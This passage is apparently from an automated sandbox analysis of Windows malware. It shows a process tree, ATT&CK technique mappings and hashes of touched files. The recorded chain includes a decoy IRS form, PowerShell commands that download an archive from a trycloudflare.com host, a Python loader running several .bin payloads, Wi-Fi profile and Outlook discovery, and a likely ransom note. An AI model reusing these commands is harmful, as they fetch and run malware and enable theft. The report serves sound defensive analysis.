  PID:1108
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\gb.bat""
    3⤵
    PID:2340
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.irs.gov/pub/irs-pdf/f1040.pdf
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:532
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa768f46f8,0x7ffa768f4708,0x7ffa768f4718
        5⤵
        
        PID:4868
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,9170444609258600941,8417833707445807488,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        5⤵
        
        PID:3764
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,9170444609258600941,8417833707445807488,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
        5⤵
        
        PID:4856
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,9170444609258600941,8417833707445807488,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
        5⤵
        
        PID:5180
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9170444609258600941,8417833707445807488,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
        5⤵
        
        PID:5348
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9170444609258600941,8417833707445807488,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
        5⤵
        
        PID:5356
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,9170444609258600941,8417833707445807488,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5288 /prefetch:8
        5⤵
        
        PID:5820
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,9170444609258600941,8417833707445807488,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5288 /prefetch:8
        5⤵
        
        PID:5832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://lighter-davidson-looked-barely.trycloudflare.com/ban.zip' -OutFile 'C:\Users\Admin\Downloads\ban.zip' } catch { exit 1 }"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2772
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "try { Expand-Archive -Path 'C:\Users\Admin\Downloads\ban.zip' -DestinationPath 'C:\Users\Admin\Downloads\Extracted' -Force } catch { exit 1 }"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5376
  - - C:\Windows\system32\where.exe
      where python.exe
      4⤵
      PID:5320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Extracted\lob\Python312\gb.bat""
    3⤵
    PID:5708
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.irs.gov/pub/irs-pdf/f1040.pdf
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:1316
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa768f46f8,0x7ffa768f4708,0x7ffa768f4718
        5⤵
        
        PID:5712
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,9819158244576783533,884485375778611323,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
        5⤵
        
        PID:2944
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,9819158244576783533,884485375778611323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
        5⤵
        
        PID:180
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,9819158244576783533,884485375778611323,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
        5⤵
        
        PID:3292
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9819158244576783533,884485375778611323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
        5⤵
        
        PID:4692
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9819158244576783533,884485375778611323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
        5⤵
        
        PID:4416
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,9819158244576783533,884485375778611323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8
        5⤵
        
        PID:2376
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,9819158244576783533,884485375778611323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8
        5⤵
        
        PID:4468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://lighter-davidson-looked-barely.trycloudflare.com/ban.zip' -OutFile 'C:\Users\Admin\Downloads\ban.zip' } catch { exit 1 }"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "try { Expand-Archive -Path 'C:\Users\Admin\Downloads\ban.zip' -DestinationPath 'C:\Users\Admin\Downloads\Extracted' -Force } catch { exit 1 }"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2772
  - - C:\Windows\system32\where.exe
      where python.exe
      4⤵
      PID:216
  - - C:\Users\Admin\Downloads\Extracted\lob\Python312\python.exe
      python.exe load.py an.bin
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:5948
  - - C:\Users\Admin\Downloads\Extracted\lob\Python312\python.exe
      python.exe load.py pay.bin
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:208
  - - C:\Users\Admin\Downloads\Extracted\lob\Python312\python.exe
      python.exe load.py payload.bin
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:2376
  - - C:\Users\Admin\Downloads\Extracted\lob\Python312\python.exe
      python.exe load.py ve.bin
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:2448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://lighter-davidson-looked-barely.trycloudflare.com/a.txt' -OutFile 'C:\Users\Admin\Downloads\a.txt' } catch { exit 1 }"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2128
- C:\Users\Admin\Downloads\Extracted\lob\Python312\python.exe
  "C:\Users\Admin\Downloads\Extracted\lob\Python312\python.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5392
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5776
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  PID:5100
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5472
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:5320
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5204
  - - C:\Windows\system32\findstr.exe
      findstr All
      4⤵
      PID:5300
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
    3⤵
    PID:2288
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:4468
  - - C:\Windows\system32\netsh.exe
      netsh wlan show networks mode=bssid
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:4360
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:4200
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:2068
- - C:\Windows\System32\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5716
  - - C:\Windows\System32\chcp.com
      chcp 65001
      4⤵
      PID:2416
  - - C:\Windows\System32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5892
  - - C:\Windows\System32\findstr.exe
      findstr All
      4⤵
      PID:5772
- - C:\Windows\System32\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
    3⤵
    PID:5724
  - - C:\Windows\System32\chcp.com
      chcp 65001
      4⤵
      PID:2360
  - - C:\Windows\System32\netsh.exe
      netsh wlan show networks mode=bssid
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:672
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\a.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:5432

C:\Windows\System32\sdiagnhost.exe
C:\Windows\System32\sdiagnhost.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4672
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:548

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:4276

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\2f6fd1fc0ac948f58101af45013166f4 /t 3236 /p 1108
1⤵
PID:2308

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5280

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5380

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4012

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2025022018.000\NetworkDiagnostics.debugreport.xml

Filesize
68KB

MD5
828b6dbc2974fcc132e2a2d2326f1c4e

SHA1
657f75ab95ed818c5f9ec0f495483367c8f579b2

SHA256
4358591fd2c836b2d6e480d4f9e4511a3516d6e0e2e9f3f50c0271d307c23725

SHA512
721341383ffc576f98dd6ea0fbb0488b816b9015f6d81476471b91e3ca5fca62525b2e1894ab3f7e203fab741e168ceee2c8b14d1f180f20d59c57b82707f11c

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2025022018.000\ResultReport.xml

Filesize
36KB

MD5
0fdc8be3f7dd1f272aefaf86fb04893e

SHA1
e8a269bfa1ef58dcc204655e831bf0ac8318a7aa

SHA256
926305d7f2f1c7daf3b60ce62fd04bc9be4f63a93956fc984e26a78b622e28df

SHA512
34f7c143de3f804401cf81fa0608c498f9c6e99b3fee204461cd5b2a48a31790350e9b915609a893283fe2a50ebde71dcad5d52715ad535eb9be2e6f0b808d2c

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2025022018.000\results.xsl

Filesize
47KB

MD5
310e1da2344ba6ca96666fb639840ea9

SHA1
e8694edf9ee68782aa1de05470b884cc1a0e1ded

SHA256
67401342192babc27e62d4c1e0940409cc3f2bd28f77399e71d245eae8d3f63c

SHA512
62ab361ffea1f0b6ff1cc76c74b8e20c2499d72f3eb0c010d47dba7e6d723f9948dba3397ea26241a1a995cffce2a68cd0aaa1bb8d917dd8f4c8f3729fa6d244

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f2b08db3d95297f259f5aabbc4c36579

SHA1
f5160d14e7046d541aee0c51c310b671e199f634

SHA256
a43c97e4f52c27219be115d0d63f8ff38f98fc60f8aab81136e068ba82929869

SHA512
3256d03196afe4fbe81ae359526e686684f5ef8ef03ce500c64a3a8a79c72b779deff71cf64c0ece7d21737ffc67062ec8114c3de5cafd7e8313bb0d08684c75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6cdd2d2aae57f38e1f6033a490d08b79

SHA1
a54cb1af38c825e74602b18fb1280371c8865871

SHA256
56e7dc53fb8968feac9775fc4e2f5474bab2d10d5f1a5db8037435694062fbff

SHA512
6cf1ccd4bc6ef53d91c64f152e90f2756f34999a9b9036dc3c4423ec33e0dcee840e754d5efac6715411751facbe78acc6229a2c849877589755f7f578ef949a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
05cb807c880969d740c3205f54be18fa

SHA1
0666f888dc02fe4c68ad3e52dacc62a9a57f5370

SHA256
a819989896640bc1ef5174cfa59a875507fdef9182dc9c18f70a7603b48e335e

SHA512
85d3a0a89f0656f19884e3ef7d19aea3668c8a2c1ff7be1746c1595ff20eefb65c86ac6455f9a48c8000bba5250266118d382afd10f4efb4a88dc6336924e743

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
63f09b74fc2bb967d16c81492f738651

SHA1
a5c0c68ae581688674b7fa80ed58f51933702638

SHA256
cb76e5a0e1f6db524b20f4f04e0aa93623c32dfe8a9818bec086422d473ce64b

SHA512
c5edf7c84dafefa2e844b8d72284e9109ae992b7a741f225ad6b441cb0f0bcb7265d65852347a62c2476ab0df418c6182db17a94da168e844abb7b9cd1334a2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
38e4b8c3952078fe147648eabff52ce8

SHA1
e23b85e139a459ec1dea9d8f35cfac44a7ec2c60

SHA256
398b1e1a686815ddef5434d7fc15525bc0ef0ba701ec531fcb3d2bb360bd0c2b

SHA512
eaa9ec80c56fdc4e7be9c1ba1b456950369ac3e2f54bcd7412b9eb7f266aecffa55f422c4650eaf7f304f03e298d2759cdff8b9555a62d98147e5999641a153e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
b4597f7f545d51664c37a627c5187695

SHA1
c47b02a931bc0f154f493d62c7de1994cece59ed

SHA256
76be147a41cee0cfaa0168fc86b64ed5b2bd3882565fe80951721f2d08cdd77d

SHA512
d43b7c54a7c2b766ec26b0fb467b8f8638fc265d3a8ee75c9bf37d6f718ac46d0a1e2331b3b28f8e1849eb98025bb97e377536ab5208f78af052aa2c703681e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

Filesize
4.0MB

MD5
b513674bd92f336d290fc57b32e17f36

SHA1
d83ed70d19962b4d42be5324d7af7e199a9ac969

SHA256
4bc1fc282c1fe463afcc753f62f69f11e9be967032f94c6b85ee8b6a0bea8192

SHA512
b591f822d3a69ebbc7767d5d706954ec9536d2307b90ded70d13b09bedbd259a4315810216cea59df5a8a4dc1d890f06050649025a137f8985c5163d1f8d16df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
318a7982f1131a2c73ae5e99eb962e52

SHA1
87acc596802cd43cebe3542a36a969df320748b3

SHA256
90104d09deb27565581e9a1843c64e0ad078872e94b5a99f400300ed3d8e8805

SHA512
e0773a0ed00b323152bc18d9e75c516882c32a8901ba5b4b1d6035c21329aed0078cc242f13d6797ca5ba9b26aebe8b8878db9cc4f31d1e0532427e6cf344a4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Filesize
322B

MD5
04b9d687a19d90b83cb13a9ab20f8bd0

SHA1
a69c4ae138caad39af744e445a68a9090d82e070

SHA256
6daa6da23436c5febf9a5998d14978aed342b9d8b8f318b573f3c08992b7cfb4

SHA512
d725285c5c8e6c9962845eef741269419544b736eaca2841c762975844505518ab4747120be3bb8e78a7da802ef3db167d993784bf6cb8631b5a96bfbfc32762

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
1c93c51cd077e1edc51153cf8e3f1374

SHA1
42312ee44a1162b798ba9338f9f06d35063aa649

SHA256
c2d8eab74105f2324ebb7f8c7f95f0e81477a9fcc528bb078fc4acbf605aaabc

SHA512
14f87d7a49650d3a7522a559d315333cc1d8bab14e60bd1065532240cb4b732823f02c5779f0fd4c0452bff05e8e34838b2354b364e4b59103fb8095a3eba918

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
6B

MD5
a9851aa4c3c8af2d1bd8834201b2ba51

SHA1
fa95986f7ebfac4aab3b261d3ed0a21b142e91fc

SHA256
e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191

SHA512
41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Filesize
20KB

MD5
b04282bf8441cb28d9eafc3e7ba1e8b3

SHA1
5e16cb6bda1c3e1ff75e017d577ac9aa9224f3b9

SHA256
30e8bd41d277a7f575bb031068d512fd1b90eddb8a6153cc35f771bda0fd7585

SHA512
4a70d3ed470a5e00959b5c2cf6f24fa6f3fb67de14d87f68533bbab986e3ff862c080d79e125767384eff5dfeeb72ed24109b755407608097084a80890540cbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
334B

MD5
38802f3bfdd8c999c7ad22bb4e93d038

SHA1
135d31d90376f35b77f02c3ffb41eeba7ca44a4b

SHA256
63c215b8a25351fcced58bec5ee0650f9f629d3b2a4570169fd47195ad13611d

SHA512
f82a7def05745b0bc0575741a610713a68391c44658fba242b704a3a376bdcccf4df7e34d3ed86d0ac18e02c5780d3b995924aefdebda992f314ef35e155e056

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a953b1b377b4373a4ac1ec8bc9f7a4dd

SHA1
1ee7b466817b04314970fb48765acc9267ba2273

SHA256
9aad31d1cd1b265498e730a5adfa5f0480684188e88f58f44074573d059fdf03

SHA512
d7965e372c7345d45149e17c6698b28e68ff1a3041d115095b1bea4016af426f13f1d8922fbe3e8315c987c47b941cf71ece0d6e7b68467eacdf5ce7032c98f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
299cf226d4cb2d635908df71ed192861

SHA1
760c9241bd79005843dce7d91fbf3821cedceeed

SHA256
aeb8c6bef50680db084fb326f96a011accb5d8c45689bbb47b8ed487826b41e8

SHA512
dac5203aaf30a613c718d1cd2819b5a9fbdbf952cc697f8c9a01dd40142b8760f6b7fb50d023a6a742dd9b6e08896110cf40d1f1afb0dccf4d661d5fb6477c56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c46247a60f81157bd5af51a50f5adacf

SHA1
fb0848c4d55687ea0d8abd2d7e28467c1f1aeb1f

SHA256
5d9b5741f4163fd2625f97069beb6775787558074537603f5aeb48500e4988a9

SHA512
7fb7614204b344ce927c0dff8c320d962f079c30c2d1fa390b93d14ad7caafe4ac597671973fb449dba8aa83fe64177e73c35e879f580e9da901cda091dd9a19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
cf94c05968cf01c0a2ddafd66f5641d1

SHA1
f37d92b480b0c1e9488f3ee68107065ba0720d11

SHA256
3bfff822a48b73a514d38bd2e6688d639779d31f4f143c3f95258d0c70c3a021

SHA512
121102bf3d60d6a4275ea067bbde1d69703c54b33bfe9ad9cad664b02f90e23cfb208e1210109520a203984f5e098cc9fb19838f6dbecfa7f3f9bc58b2e98a5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Filesize
137B

MD5
a62d3a19ae8455b16223d3ead5300936

SHA1
c0c3083c7f5f7a6b41f440244a8226f96b300343

SHA256
